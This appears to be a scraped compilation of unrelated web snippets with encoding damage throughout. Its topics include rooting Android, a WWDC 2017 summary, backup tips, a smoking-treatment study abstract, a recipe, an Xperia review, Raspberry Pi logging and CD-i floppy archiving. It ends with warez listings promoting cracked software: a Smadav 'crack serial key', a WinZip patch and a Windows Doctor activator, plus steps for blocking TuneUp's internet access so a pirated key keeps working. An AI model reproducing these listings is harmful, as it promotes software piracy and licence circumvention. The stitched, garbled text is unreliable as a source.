ShareKM - My favorite root app's gotta be ShareKM. It's brilliant! It connects the phone to your computer over wi-fi/data/bluetooth. Slide the mouse pointer from the edge of the screen, and voila!, the mouse pointer jumps to your phone! You can now use your computer's keyboard to type on your phone, or copy text from one to the other. It's really neat, you should check it out if you have a rooted Android device. Video of this app in action embedded below:
OBackup - Nandroid Backup - Nandriod backup means a full image backup of your phone. So if you mess up something tinkering, you can always restore the phone exactly to how it was. OBackup does cloud backups and you can schedule your backups, which is pretty neat.
LMT - LMT enable features on stock Android that are typically available on custom ROMs, and is often the reason why people do install custom ROMs. It isn't avaialble on Google Play, but can be downloaded from here. A full review here, and video of the app in action below:
Spend time configuring your phone, it'll be worth it. Tinker. Enjoy.
|Special 322: WWDC 2017||
At their 2017 World Wide Developers Conference, Apple announced six new things. tvOS gets an update and Amazon Prime Video. watchOS 4 includes new faces and functionality. macOS High Sierra will incorporate Apple File System and improvements to Safari, Mail, and Photos. MacBook Pros and iPads get a spec bump, and iMacs can now handle VR with the HTC Vive. The iMac Pro, coming later this year, might fill the MacPro-sized hole in power users' hearts. iOS 11 will include a slew of new features and improvements, most notably machine learning and augmented reality. The new 10.5" iMac Pro further blurs the line between tablets and power computers. And last, but surely not least, the new HomePod is the rumored "Siri Speaker," with a big focus on music.
Download or subscribe to this show at https://twit.tv/shows/twit-live-specials.
Thanks to CacheFly for the bandwidth for this special presentation.
|8 Tips For Safe-Guarding Small-Business Computer Data (Infographic)||Click image to enlarge. View the full post that goes with this infographic. Share This Image On Your Site Please include attribution to https://kunzonpublishing.com/ with this graphic. Hashtags: #selfpublishing #smallbusiness 8 Tips For Safe-Guarding Small-Business Computer Data (Infographic) https://t.co/pY8izvKtO0 via … Continue reading |
|Computer-Data Backup-Strategy For Self-Publishers (Infographic)||Click image to enlarge. View the full post that goes with this infographic. Share This Image On Your Site Please include attribution to https://kunzonpublishing.com with this graphic. Computer-#Data Backup-Strategy For Self-Publishers (Infographic) https://t.co/LyRZwzOdTW @jckunzjr #selfpub — Carla Douglas (@CarlaJDouglas) January … Continue reading |
|Computer-Data Backup-Strategy For Self-Publishers||Synopsis Protecting your computerâs data files is something every self-publisher must know about and deal with before itâs too late. Therefore, itâs essential that you keep the back-up process simple and automatic. It’s also imperative to create multiple copies, on-site, … Continue reading |
|8 Tips For Safe-Guarding Small-Business Computer Data||Synopsis No matter how small your business is, you still must have a data backup plan in place. No one method alone is a guarantee that your data is completely safe. So here are some tips that show you how … Continue reading |
|Re: Refactoring Day 2 : Move Method|
Since it can be difficult to find human opponents for a face-to-face game and I don't like playing against the computer, I will have to try out the internet chess site. Thanks for the info.
|Treating Smoking in Adults With Co-occurring Acute Psychiatric and Addictive Disorders||Objectives: Tobacco use is undertreated in individuals with psychiatric and substance use disorders (SUDs), with concerns that quitting smoking may compromise recovery. We evaluated outcomes of a tobacco intervention among psychiatric patients with co-occurring SUDs.
Methods: Data from 2 randomized tobacco treatment trials conducted in inpatient psychiatry were combined; analyses focused on the subsample with co-occurring SUDs (nâ=â216). Usual care provided brief advice to quit and nicotine replacement therapy during the smoke-free hospitalization. The intervention, initiated during hospitalization and continued 6 months after hospitalization, was tailored to readiness to quit smoking, and added a computer-assisted intervention at baseline, and 3 and 6 months; brief counseling; and 10 weeks of nicotine replacement therapy after hospitalization. Outcomes were 7-day point prevalence abstinence from 3 to 12 months and past 30-day reports of alcohol and illicit drug use.
Results: The sample consisted of 34% women, among which 36% were Caucasian, averaging 19âcigarettes/d prehospitalization; the groups were comparable at baseline. At 12 months, 22% of the intervention versus 11% of usual care participants were tobacco-abstinent (risk ratio 2.01, Pâ=â0.03). Past 30-day abstinence from alcohol/drugs did not differ by group (22%); however, successful quitters were less likely than continued smokers to report past 30-day cannabis (18% vs 42%) and alcohol (22% vs 58%) use (Pâ<â0.05), with no difference in other drug use.
Conclusions: Tobacco treatment in psychiatric patients with co-occurring SUDs was effective and did not adversely impact recovery. Quitting smoking was associated with abstinence from alcohol and cannabis at follow-up. The findings support addressing tobacco in conjunction with alcohol and other drugs in psychiatric treatment.|
|Purchasing & Production Manager|
Production & Purchasing Manager | Full Time Position
Bazzaz, Inc. is seeking to fill a full-time position for a Purchasing & Production Manager.
Bazzaz is a designer and manufacturer of superior-quality motorcycle & ATV electronics and dynamometers located in Chino Hills, CA. We are committed to providing customers the very best experience which we believe stems from hiring the best employees. For more information on the company please visit bazzaz.net.
Location: Chino Hills, CA
Description: Seeking an individual who will plan, organize, and control production at Bazzaz Z-Fi fuel controller factory, which produces harnesses, strain gages, and printed circuit boards. Candidate must be committed to ensuring that Bazzaz products are produced efficiently, on time, within budget and to the highest quality standard. Issues Purchase Orders for the raw materials. Candidate should be solution-driven and acutely focused on quality. Listed below are the basic duties and requirements of the position:
We are looking for a responsible, highly motivated and detail oriented individual, who wants to be part of a growing and dynamic company. This person must be a problem solver, have a get it done attitude, and enjoys working with a team. Bazzaz is on the leading edge of technology in the motorcycle aftermarket industry and this position plays a critical role in delivering the ultimate customer experience.
*Position descriptions and anticipated skills acquired are neither conclusive nor definite and can be expected to change throughout term of employment.
|Final implementation of SEACON: new scope and new open system platform.|| Mahou, A L y Soto, F J y Blanco, F y Pastor, G y Serna, J y Alfageme, M A y Corera, J y Criado, R. y Ferrer, V y Martin, J y GarcÃa-Santesmases, J M (1997) Final implementation of SEACON: new scope and new open system platform. In Power Industry Computer Applications., 1997. 20th International Conference on. IEEE Conference Publications . IEEE Xplore Digital Library , pp. 54-59. ISBN 0-7803-3713-1 |
|Lighten Your Load: Five Things You Should Leave at Home When You Travel to Ireland|
For the last twenty years, Iâve been hosting visitors to Ireland, and certain items always get packed, but rarely used. Here’s a look at some things you should think twice about before bringing them to the Emerald Isle. Computers Arenât the Only Way to Go Digital Now that phones and tablets have essentially become handheld […]
The post Lighten Your Load: Five Things You Should Leave at Home When You Travel to Ireland appeared first on Irish Fireside Travel and Culture.
|I Flew RyanAir, and I Almost Liked It|
What it’s really like to fly on a â¬10 flight from Ireland. After typing in dates for a flight from Shannon â Ireland’s west coast airport â to London, my computer search churned out an insanely broad range of flight options. Several came in at around â¬130 ($140), loads more were over â¬200 ($217), and […]
|Apples to Oranges||As promised, here is the battle station in action:|
Two computer screens, and a fancy desktop way in the back corner there that lets off a lot of pretty light shows. And an executive chair. If we're home, he's here. :o)
A a consequence of our fabulous CSA we have been getting, we have had apples and oranges sitting around begging to be used up. For some reason, we can't keep up with eating them before another round comes. The Boy mentions: "hey, you should find something to use up these apples." But I know there are also a ton of citrus in there. I think, gee- I'll just google something.
Yeah. The FEW recipes I find that involve both apples and oranges seem overly weird (shortening in quick bread?). So, I start inventing my own. I just purchased a kitchen scale for these as well. Using the book, Ratio, I concocted the delicious:
Apples to Oranges Muffin
6 oz. AP flour
2 oz. whole wheat flour
1 t. salt
1.5 t. baking powder
.5 t. baking soda
zest from 2 oranges
1.5 t. cinnamon (might want to add a touch of ground cloves if you have any)
4 oz. orange juice
6 oz of grated apple
4 oz melted butter (1 stick)
2 large eggs
.5 t. vanilla
Oven at 350.
Mix wet with dry until just combined.
Spoon into 12 muffin cups. ( I added toasted pecans to the top of half because I like the texture/crunch.)
Bake for about 20 minutes, or until a paring knife inserted into the center of a muffin comes out clean (as per Michael Ruhlman).
And they are GREAT. The Boy likes them too! Yay!! I love the concept behind this book - that baking is all a matter of getting the ratios right, and then you can invent to your hearts desire. Not gunna lie, totally turned on by the fact that I have a kitchen scale and I can invent tons of weird new flavors of cakes and muffins and breads. If that makes me wrong, then I don't wanna be right.
|Fix your Xperia X10||Many reviewers test a product over a period of 1 week and feel they can adequately give someone advice on whether or not to buy a certain product. Iâve lived with the Xperia X10 for almost a year now so my review is very personal and will touch on all the âveâs and positives for the phone.|
The camera on the phone is great and it was one of the key buying points when I got the phone. I have however realised that I donât use the camera nearly as often as I thought I would. The camera is good compared to other phones, but no where near as good as a good 5 megapixel camera â such as Canon IXUS range.
The dedicated camera button can take 4-10 seconds to launch camera app â that is annoying. I have not found a fix for that yet.
TimeScape and MediaScape
Those 2 apps were another reason I bought the phone. They were great for about 2-3 weeks, after which I wanted toknow how to get rid of them. The problem with those 2 apps is that you can get many apps on the market that can do a better job. For example, I donât use MediaScape for music or video â instead I use PowerAmp and RockPlayer. Not X10 users I know use MediaScape. As for TimeScape â I used it for 1 week and never touched it again. Itâs a shame that these are the 2 apps that hold back quick Android updates on the X10 â one has to wonder just how important they are to Sony Ericsson (yes no user would mind if you got rid of them)?
Perhaps Sony Ericsson would do well to offer a customised version of X10 and a non customised version. If there was ever a phone that could have toppled the iPhone it was this phone. Sony Ericsson needs to be very careful not to fall in the Microsoft trap â for 10 years Microsoft thought it had the formula for Smartphones figured out. Users view their Smartphones like Computers. When a new OS comes out â give me the ability to update. If Sony Ericsson employees have computers, they will understand how important it is to be able to remove manufacturer add-ons â like MediaScape and TimeScape. Instead of wasting money on MediaScape why not just buy PowerAmp????
On the Move Music Player Test
You cannot select music using MediaScape if youâre walking. IMPOSSIBLE! The buttons are too small and the swipe bar at the bottom is just too thin. iPhone music player buttons are bigger and easy to select music as you walk. Blackberry Bold is also easy, albeit not touch screen. Sony Ericsson â maybe itâs time you fired you UX team! Seriously, pick uo one of the phones and walk at a moderate pace and try and select Album â Scroll to one in the middle of the list â select a song in the middle of the album! IMPOSSIBLE! Yet, this is an afterthought for iPhone or people who download a 3rd party app!
Fixing Headset Volume on Xperia X10
A quick look around on any train ride and Â½ the people have headphones on. Music player functionality just has to be spot-on in this day and age where the iPod/iPhone set the benchmark over 3-4 years ago.
The headset volume of Xperia X10 running Android 1.6 is just terrible. Many of you will say that the X10 is now on Android 2.1 Ãclair. Great â so I retested and decided that the 2.1 results would be the best and most up to date. I compared it to 2 of my old phones â the iPhone 3G the Blackberry Bold (9000) and my wifeâs iPhone 4. I conducted the test with a pair of in-ear JVC-FXC80 headphones and over-ear AKG 701. The X10 volume is still terrible. It is about Â½ as loud as the iPhone 3G. The Blackberry Bold is very loud and clear â the iPhone 4 has no reception but sounds great all the same.
I downloaded PowerAmp and tried to boost the volume that way. DISTORTION! Thatâs right, when itâs loud the music is simply too distorted. This is obviously not the fix for the volume. PowerAmp is a great music player, but it is definitely not going to sort out your music playing experience on the X10.
I did a quick search using Google and there were suggestions that the Nordic ROM would fix the headphone problem. So at last after almost 10 months I decided to download a custom ROM and root my phone whilst I was at it.
So I went here - http://forum.xda-developers.com/showthread.php?t=835308 and downloaded the custom ROM, loaded it on the X10 and fired up the music player.
Yes, the music is now louder. Shame on you Sony Ericsson!
Here is the best tip anyone can give you. Download a plain black background and use it as your wallpaper. Turn down your screen brightness (contrast is better with the black wall paper) and there you have it. 20-30% better battery!
Does anyone actually use the Default X10 keyboard? I use SwiftKey.
Making Phone calls
The buttons are now bigger and pressing the call button does not tale you to another menu item like in 1.6 but makes the call! Good job. I think the calling functionality is good. Just make the letters a little bigger on the contacts menu.
In hindsight I probably should have gone for the Google Nexus One. The fact that it receives updates before any other phone is justification enough. I have lived on Android 1.6 for almost 12 months and my contract ends in 6 months time. Logic would suggest â once bitten twice shy. The other reason is the volume on the Nexus One. I could play my music properly.
My next phone will run be an HTC or Vanilla Android. Iâm not interested in silly customisations that delay software upgrades â HTC somehow has their upgrades figured out.
In 6 months time Iâll upgrade to a phone with better than 640 x 960 resolution. If Samsung can get AMOLED screens to 640 X 960 then they have a winner. But it would be silly to play catch up with the iPhone. I would suggest 640 X 1024.
|Comment on How To Get Into a Fully Funded PhD Program: Contacting Potential PhD Advisors by ProFellow||Hi! Please see our article Fully Funded PhD Programs in Computer Science: https://www.profellow.com/fellowships/fully-funded-phd-programs-in-computer-science/|
|Comment on How To Get Into a Fully Funded PhD Program: Contacting Potential PhD Advisors by sanjay||Hi,
I am would like to do Phd in computer science. Request you kindly let me university that are providing fully funded
|Sending Tado Data to Loggly|
I've just had a Tado smart thermostat installed at home: it's a clever device that controls the boiler, central heating and hot water and is linked to the internet. It has a room thermostat and takes account of the external temperature as well. You can control it from your smart phone or from the web app and, if you want, it will track your location so that when you leave the house it turns the temperature down and brings it up again in time for when you get home again.
I expect the web app and the mobile app are both in constant development and right now there are features only available in one or the other. For instance, you can only set the hot water schedule in the web app but can only see the historic temperature data in the mobile app (you have to turn your phone to landscape orientation to make it magically appear).
I wanted to see the historical temperature data on my computer instead of my phone so I had a poke around and have found a way to get hold of the data on one of my Raspberry Pis and send it to Loggly to graph it.
Read moreâ¦ (9 min remaining to read)
|Raspberry Pi System Logging and Loggly|
I've already written about how useful Loggly is to log data from a Raspberry Pi, but like me, you may want to know more about how system logging actually works and what the extra configuration added by the Loggly setup script means.
This post explains how system logging works and how Loggly fits into it. It describes how the log files are rotated to avoid them filling up the disc and it also goes into a lengthy detour regarding how to encrypt the log traffic between your computer and Loggly, how all the encryption actually works and how you know you can trust it.
Read moreâ¦ (20 min remaining to read)
|Monitoring Broadband Speed with Loggly|
I've been having trouble with the speed of my network at home and needed to check whether the broadband link to the internet was working as fast as it should be. To check this, you really need to make many measurements over time, as at different times of the day the performance will vary depending on how many other people in the area are using the same link. To check the speed, I have plugged a spare Raspberry Pi directly into the my Virgin Media Superhub via an ethernet cable and set it up to measure and report the speed every hour. I'm sending the data to an online logging service called Loggly so that I can access it and graph it easily from any other computer.
Read moreâ¦ (11 min remaining to read)
|CD-i floppy inventory||Last weekend I future-proofed my CD-i floppy collection. A bit to my surprise, all floppies except one turned out to be perfectly readable (nearly twenty years after they were last written!). Luckily, the one exception was a backup copy so I didnât lose any contents.|
I had originally intended to use the borrowed CDI 182 unit for this (it has two floppy drives). The primary motivation for this was that my unstowed CDI 605 could not read beyond track zero of any floppy, but after giving the matter some thought I decided to try my other CDI 605 first, the primary motivation for this being speed (see below). It turned out that this 605 could read the floppies perfectly, including the three 38U0 format ones that gave problems on the 182 unit. Microware has defined a number of OS-9 disk formats for floppies, the 38U0 one supposedly being the âuniversalâ 3.5" format (there is also a 58U0 âuniversalâ 5Â¼" format).
The problem with the âuniversalâ formats is that track zero can be (and on my floppies, is) in a different density which makes it a bad fit for most tools, both on CD-i and PC. It also means that only 79 tracks are used for data storage, giving a raw capacity of 79 Ã 2 Ã 16 Ã 256 = 632 KB. The 3803 format used by all my other CD-i floppies uses all 80 tracks and consequently has 8 KB more of raw storage for a total of 640 KB (these are both double-density, double-side formats (DS, DD) with 16 sectors of 256 bytes per track like nearly all OS-9 disk formats).
Before unstowing my other CDI 605 (it was nearly at the bottom of a 150 cm stowed equipment stack) I tried reading the floppies with my trusty old Windows 98 machine which still has floppy drives. I could not quickly find a DOS tool that handled the 256 byte sectors (not even raread and friends), although I suspect that Sydexâs TELEDISK product would have handled it just fine. I also tried Reischkeâs OS9MAX which should handle all OS-9 formats under the sun according to its documentation. The demo version ran under MS-DOS and gave me working directory listings, even for the 38U0 floppies, but it does not support actually reading the files and I am somewhat doubtful about the current availability of the paid-for full version (even apart from cost concerns).
Why did I decide to use the 605? It was not a question of reading the disks (the 182 did this mostly fine) but of handling the data thus read. The 182 unit has a SCSI connector but I have no drivers for it (yet) and dumping my full floppy collection over the serial port did not really appeal to me for speed and reliability reasons (it could have been done, of course).
The 605 player has a SCSI connector and includes drivers for it so I could have just connected it to the SCSI disk in my E1 emulator and copied the floppies to hard disk (I would still have needed to transfer them to my laptop which would have been a two-step process via the Windows 98 PC as I have no SCSI connection on my laptop).
Instead I used the BNC network connector of the 605 to directly transfer floppy images to my laptop (it needs a network switch supporting both a BNC connector and the modern RJ45 connectors, but luckily I have two of those, even if they are only 10 Mbit/s). Starting up the network environment of the 605 took only two OS-9 commands at the command shell prompt:
ispmode /le0 addr=10.0.0.120After this I could just ftp in to my laptop where I ran ftpdmin, a very minimal ftp server program, and transfer floppy disk images directly:
ftp 10.0.0.110(where /d0@ is the raw floppy device, for 38U0 I used /d0uv@, both are built-in for the 605).
The transfers ran at the maximum speed of the floppy drive (way below the 10 Mbit/s network speed), and the resulting .dsk files are perfectly readable using the âv option (virtual disk) of Carey Bloodworthâs os9.exe program even though that program was originally written for Tandy Color Computer OS9/6809 floppies (the floppy disk format was not changed for OS-9/68000 which is at the core of CD-iâs CD-RTOS operating system).
For easy access I also created a âtarâ format archive of each floppy on a RAM disk:
chd /d0and ftpâd those to my laptop as well (the /r768 device is a 768 KB variation of the /r512 built-in 512 KB RAM disk device of the 605 player).
I ended up with the following collection of unique floppy disk images:
The 605* and eb* floppies are mostly interesting for CD-i 605 or E1 emulator owners, but the bcase floppy contains a set of CD-i standard conformance test programs that.
The inet and nfs floppies contain a full set of Internet software including Telnet and FTP servers and clients and an NFS client (all except the latter are also in the 605 ROMs).
The os9sys floppy contains a full set of Professional OS-9 programs and is my original source for most of the OS-9 CD-i disc that I described earlier (most of these are not in ROM on any CD-i player that Iâve seen so far).
The pubsoft floppies contain miscellanous utilities such as bfed, du, kermit, umacs and vi, most of which can be obtained elsewhere, some CD-i specific utilities such as da (CD-i disk analyzer) and iffinfo (CD-i IFF file dumper) as well as library source files for the CD-i IFF file library.
The pvpak floppy contains preview software for CD-i images that will preview CD-i IFF files from an NFS-mounted host file system directory.
The ubridge floppies are the goldmine (and also the 38U0 format ones) as they contain a full set of native Microware C compiler/assembler/linker/debugger software for OS-9 complete with CD-i header files and libraries and C runtime startup sources. Both the srcdbg and sysdbg debuggers are included as well as the rdump utility for dumping ROFF (Relocatable Object File Format) files.
Unfortunately, most of the above software except for the pubsoft contents is copyrighted property of Microware (now Radisys) or OptImage (a former Philips/Microware joint venture) which means that I cannot distribute it, even though they could be very useful to CD-i homebrew developers. For that the hopefully soon-to-be available GCC cross-port will have to be enough...
While investigating all of the above I also stumbled upon a 450 MB OS-9 hard disk image for MediaWorkshop. The os9.exe program recognizes it just enough to say that it does not support it so I have no real idea about its contents except the obvious.
To remedy that problem Iâm in the process of adding SCSI disk support to CD-i emulator so that I can use the SCSI support in the CD-i 605 ROMs to mount the disk image and look at it. This should also allow the CD-i 180 to boot from a SCSI disk if I ever find drivers for it (a possible path to that has just appeared, weâll see...).
|Comment on Digital and Independent Media Revolution in Hawaii by Roger Thomas||I run a 3D Computer Animation and Visual Effects studio here on the Big Island. I'm interested in learning more about digital media in Hawaii.
- Roger Thomas|
|Smadav Pro Rev 10.1 Full|
Smadav Pro Rev 10.1 Full
SmadAV Pro 10.1 PRO 2015 is a latest version antivirus for PC. It software today release 2015. Smadav antivirus have a best protection and make secure your PC full time when you offline or online. Crack Smadav 10.1 serial key make your PC more secure and best protection. It is one of the best antivirus is all over the world by developing Indonesia. Also best popular antivirus Indonesia and many Indonesia people use this software.
Smadav PRO 2015 Features:
How to Install SmadAV Pro 10.1 Crack/Serial Key?
|IDM 6.23 Build 12 Final Full Version|
IDM 6.23 Bulid 12 Final Full Version
Internet Download Manager (IDM) is a tool to increase download speeds, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use. Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
What's new in version 6.23 Build 12 :
|Winzip 18 Pro with Patch and Serial Key|
Winzip 18 Pro with Patch and Serial Key | 82.43 MB
Unzip all major formats
With just a click, open all major compression file types, including Zip, Zipx, RAR, 7Z, TAR, GZIP and more.
Protect your privacy
Easily encrypt files as you zip to keep information and data secure. Add watermarks to deter unauthorized copying.
Simplify cloud sharing
Share directly to more cloud services, manage your cloud files more easily, and quickly share links to your cloud files.
Just add WinZip
Bring popular WinZip features into the software you use most with new WinZip Express Add-Ons*.
Zip and manage content
Compressing large files and folders makes them easier to transfer and saves storage space. Choose files from your PC using simple, drag-and-drop functionality or get files you've stored on Box, SkyDrive, Dropbox, Google Drive, CloudMe and SugarSync to zip instantly. Zip files are perfect for sharing because they let you organize multiple files into one convenient package.
Extract content from the industry's widest selection of compressed file types, including Zip, Zipx, RAR, 7Zip, BZ2, LHA/LZH and many more. When extracting encrypted files, WinZip auto-wipes all temporarily extracted copies to prevent misuse.
NEW! Connect to more cloud services
WinZip connects directly to Box, SkyDrive, Dropbox, Google Drive, CloudMe and now SugarSync, so you can organize all your cloud files at once. Use WinZip to zip and save large files to the cloud or retrieve files or links to share. Secure your files and save precious online storage space by zipping and encrypting them first.
NEW! One-stop cloud file sharing
Imagine being able to see all your cloud filesâeven if they are saved on various cloud servicesâin a single view. Now you can, with WinZip 18. Instead of wasting time moving back and forth between various services to see where your files are and how much space you have, enjoy fast, easy cloud file sharing without leaving WinZip.
Zip and share to social media
Use ZipShare to share any type of file to Facebook, Twitter and LinkedIn. Keep everyone in the loop by posting content to all three social networks at once. Simply select the files you want to share, compose your message, and pick the social networks where you want your files to go.
NEW! Email large files with just a click
WinZip 18 lets you email large files or folders using any of your cloud services. Your files are automatically uploaded to your default cloud service and a link to them is placed in your outgoing email. Send up to 50MB free if you're using the ZipSend cloud or move up to ZipSend Pro to send up to 2GB. and etc
NEW! Zip and share to more clouds
Protect your files in the cloud and use less space by zipping them first. WinZip 18 lets you connect directly to your cloud services, including Box, Google Drive, SkyDrive, Dropbox, CloudMe and SugarSync. Zip before you upload, open zip files saved in the cloud, or select files from the cloud to zip and share.
NEW! Streamlined cloud navigation
Access and manage your cloud files as easily as you access the files on your computer. WinZip 18 makes it simple to send files to and from the cloud, save between your cloud accounts and monitor your cloud storage space.
NEW! Copy and share Cloud Links
Quickly send links to your cloud files by email, instant messaging and on social media sites.
NEW! Work faster with WinZip Express Add-Ons
Bring the power of WinZip into the software you use every day. Download the WinZip Express Add-On for Explorer for free and get instant access to the WinZip features you use most directly within Explorer. Add-Ons are also available for Microsoft Outlook, Photos and SharePoint.
NEW! Compress files even more
Make Zip and Zipx files even smaller with the enhanced zip engine in WinZip 18.
|A crucial week for justice||On Tuesday we'll see if our elected political representatives yet again undo the good work of our unelected representatives as the Legal Aid Bill returns to the Commons for MPs to consider the Lords' amendments.|
Peers made changes to the Bill that would mean that the worst of the legal aid cuts in the legislation would be removed. Access to legal aid and the way that it is delivered would be protected for those who have suffered domestic violence, for vulnerable children and for disabled people.
The government will be no doubt keen to use financial privilege as an excuse to overturn these changes like they did recently to reverse changes to their controversial welfare reforms. However, if costs are to be used as an excuse as removing access to free legal advice to hundreds of thousands of people when they need it most, perhaps Ministers should consider the Â£43 million spent on consultants by the MoJ in the last year and the Â£12m that's been wasted an an e-Working system that is years behind schedule and has virtually collapsed.
What's really happening to our legal system here of course is that it is becoming increasingly the preserve of those who are able to pay for it. As Heather Brooke pointed out last week, while 140 local courts have been closed and legal aid is cut, Â£300m has been invested in the Rolls Building (home of the failed e-Working system) which is to handle high-end commercial disputes for a mostly foreign clientele.
It's not just Russian Oligarchs that are benefiting from changes to our justice system. The Association of British Insurers has admitted it will profit from the legal aid cuts. Last year it was revealed that the Justice Minister responsible for driving through these reforms, Jonathan Djanogly will personally profit from the plans as he has a personal stake in the insurance industry. Now that's what I call financial privilege.
Possibly the best hope of amendments - like Baroness Scotland's that ensures victims of domestic violence have access to legal aid and former Paralympian Tanya Grey Thompson's that ensures those who are eligible aren't forced to phone a call centre for advice - surviving the glare of the coalition is the lack of time Parliament has been able to afford to the legislation between the Easter break and the end of this parliamentary session. Who says MPs having long holidays is a bad thing!
If you'd like to contact your MP to ensure we don't lose out on legal aid when we need it most visit the 38 degrees site ahead of Tuesday's vote.
|Internet Download Manager 6.18 build 2 Final Retail|
Internet Download Manager 6.18 build 2 Final Retail | 5.7 MB
Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download accelerators and managers that segment files before downloading starts, Internet Download Manager segments downloaded files dynamically during download process.
Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance. Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.
- All popular browsers and applications are supported! Internet Download Manager has been tested with the following browsers: Internet Explorer, MSN Explorer, AOL, Netscape Communicator, Netscape 6, Netscape 7, Mozilla, Mozilla Firefox, Mozilla Firebird, Opera, NetCaptor, UltraBrowser, Slim Browser, Avant Browser, MyIE2, Optimal Desktop, Ace Explorer, Advanced Browser, 27 Tools-in-1 Wichio Browser, WindowSurfer, 550 Access Browser, FineBrowser Freeware, Kopassa Browser, Fast Browser Pro, Enigma Browser, GoSuRF, K-Meleon, Smart Explorer, The Off By One Web Browser, Smartalec Voyager, CrystalPort AppCapture, The Family Browser, XANA Web Browser, Bluto, AutoSurf, 32bit Web Browser, BrowseMan, WrestlingBrowser, Eminem Browser, UltraBrowser, Cygsoft LDAP Browser, and Net M@nager. Internet Download Manager supports all versions of popular browsers, and can be integrated into any 3rd party Internet applications.
- Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.
- Download Speed Acceleration. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
- Download Resume. Internet Download Manager will resume unfinished download from the place where they left off.
- YouTube grabber. Internet Download Manager can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.
- Simple installation wizard. Quick and easy installation program will make necessary settings for you, and check your connection at the end to ensure trouble free installation of Internet Download Manager
- Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.
- Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
- Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of download managers have this feature.
- Built-in Scheduler. Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done.
- IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It's possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.
- IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.
- IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.
- Download All feature. IDM can add all downloads linked to the current page. It's easy to download multiple files with this feature.
- Customizable Interface. You may choose the order, and what buttons and columns appear on the main IDM window.
- Download Categories. Internet Download Manager can be used to organize downloads automatically using defined download categories.
- Quick Update Feature. Quick update may check for new versions of IDM and update IDM once per week.
- Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
What's new in version 6.18 Build 2 ? (Released: October 9, 2013)
- Resolved compatibility issues with Google Chrome 30
- Fixed downloading of groups of links for several file sharing sites
|AVG Internet Security 2014 v126.96.36.19916 x86 Full|
AVG Internet Security 2014 v188.8.131.5216 x86 Full | 125.91 MB
AVG Internet Security 2014 is a capable security suite which does a generally very good job of protecting your PC from dangers, both on and offline.
At the program's core is AVG's strong antivirus engine. A little more accurate in this release, and with significantly reduced scanning times, this monitors every file you access, detecting and removing malware before it can cause any damage.
The suite also includes a firewall, which protects you from network attacks and monitors running programs to make sure malware can't "phone home".
The spam filter is also significantly enhanced. The last edition blocked only 55% of our test junk emails; AVG Internet Security 2014 has raised the detection rate to an impressive 88%.
The suite's Windows 8-style interface is little changed, but simple to use, with the various tiles delivering quick access to the program's various functions and features. An Options menu allows you to carry out just about any Internet Security Suite action in just a couple of clicks, and if you're still a little confused then a good local Help file will quickly point you in the right direction.
As with the previous edition, AVG Internet Security only highlights potentially dangerous search engine results if you install its toolbar, which the setup program will do by default (although if you choose the Custom Installation option then you can change this).
Fortunately, the suite does include other technologies to help keep you safe online. AVG's LinkScanner module vets web pages before they're displayed in the browser, and if something does get through then it'll still be vetted by the antivirus engine, which will detect and remove most dangerous files.
The 2014 release looks and feels much like previous builds, but it does feature improved malware detection and full Windows 8.1 compatibility, as well as adding two useful new privacy additions to the suite.
If you have any confidential documents then the new Data Safe option allows you to protect them in an encrypted file (click Computer > Create Your Safe).
And if you want to delete confidential files and be sure they're gone forever, with no hope of recovery, then you'll appreciate the Shredder. Simply right-click a file or folder in Explorer, select "Permanently shred with AVG", and after confirming your decision it'll be securely deleted.
|TuneUp Utilities 2014 14.0.1000.88 Final Full Version|
TuneUp Utilities 2014 14.0.1000.88 Final Full Version | 28.79 MB
low pc ? no tension .when we install new windows on our pc ,our pc become running fast.but after some days our pc become slow .
Because we install many software on our computer as our need and for that our registry loaded heavily.
And as result,our pc become slow.for solve this problem try this software that will help you for cleaning registry and junk files also remove and fix other errors that helps to keep pc running slower.
Windows Drives Defragmenter
Start-up Programs Manager
Useful offers for Speed up your Windows
Automatic System Scanner and Problems Fixing
Windows Registry Defragmenter
Junk/Temp Files Remover
Make your Windows more Secure
Optimize your Windows on one Click
Files Without Recovering Remover
System Process Manager
Scan everyone of your Windows Portations and Fixing Errors
Deleted Files Recovering
Smart Uninstall manager
1.Disconnect your internet connection while installing the software and use regkey for activision.
2.Block internet access of this software from firewall.
|Windows Doctor 2.7.5 Final With Activator|
Windows Doctor 2.7.5 Final With Activator | 7.52 MB
